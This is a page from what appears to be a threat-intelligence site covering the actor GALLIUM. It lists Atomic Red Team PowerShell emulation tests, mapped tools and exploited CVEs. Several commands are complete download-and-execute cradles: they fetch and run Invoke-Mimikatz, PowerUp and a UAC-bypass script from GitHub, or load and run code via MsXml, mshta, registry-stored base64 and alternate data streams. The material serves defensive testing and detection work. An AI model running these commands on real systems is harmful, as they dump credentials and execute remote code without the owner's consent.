$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr

command_promptwindowsInvoke-AppPathBypass

Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"

command_promptwindowsPowershell MsXml COM object - with prompt

powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"

command_promptwindowsPowershell XML requests

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"

command_promptwindowsPowershell invoke mshta.exe download

C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"

manualwindowsPowershell Invoke-DownloadCradle

powershellwindowsPowerShell Fileless Script Execution

# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))

powershellwindowsNTFS Alternate Data Stream Access

Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand

powershellelevatedwindowsPowerShell Session Creation and Use

New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use

powershellwindowsATHPowerShellCommandLineParameter -Command parameter variations

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop

powershellwindowsATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop

powershellwindowsATHPowerShellCommandLineParameter -EncodedCommand parameter variations

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop

powershellwindowsATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop

command_promptwindowsPowerShell Command Execution

powershell.exe -e  #{obfuscated_code}

powershellelevatedwindowsPowerShell Invoke Known Malicious Cmdlets

$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
    "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
    $cmdlets}

powershellwindowsPowerUp Invoke-AllChecks

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks

powershellwindowsAbuse Nslookup with DNS Records

# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]

powershellwindowsSOAPHound - Dump BloodHound Data

#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}

powershellwindowsSOAPHound - Build Cache

#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}

▶

Tools Used

13 mapped

S0002 · Mimikatz S0013 · PlugX S0020 · China Chopper S0029 · PsExec S0039 · Net S0057 · Tasklist S0075 · Reg S0096 · Systeminfo S0160 · certutil S0190 · BITSAdmin S0349 · LaZagne S0357 · Impacket S0508 · ngrok

Other tooling / TTPs (curation, not ATT&CK-mapped):

METERPRETERMIM221MIMI KETTANSOFTCELL MIMIKATZSOFT CELL MIMIKATZSWORD2008SWORD 2008

◈

CVEs Exploited

CVECVE-2017-11882
CVECVE-2017-3066
CVECVE-2017-9805
CVECVE-2018-2628
CVECVE-2018-2893
CVECVE-2019-19781
CVECVE-2019-7609
CVECVE-2020-1472
CVECVE-2021-26855
CVECVE-2021-26857
CVECVE-2021-26858
CVECVE-2021-27065
CVECVE-2021-31207
CVECVE-2021-34473
CVECVE-2021-34523
CVECVE-2021-44228
CVECVE-2022-30190

Intelligence Graph · click any node to traverse

CVETechnique ActorTool Family

drag to reposition · click any node to traverse · button top-right enlarges

External lookups - second-class, for what we don’t hold ourselves

MITRE ATT&CK MITRE search Malpedia Google

Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities

Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs

Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures

Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1

About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service

threatengine.sh · Open-source threat intelligence platform · 100+ authoritative sources · Every fact traces to its origin

GALLIUM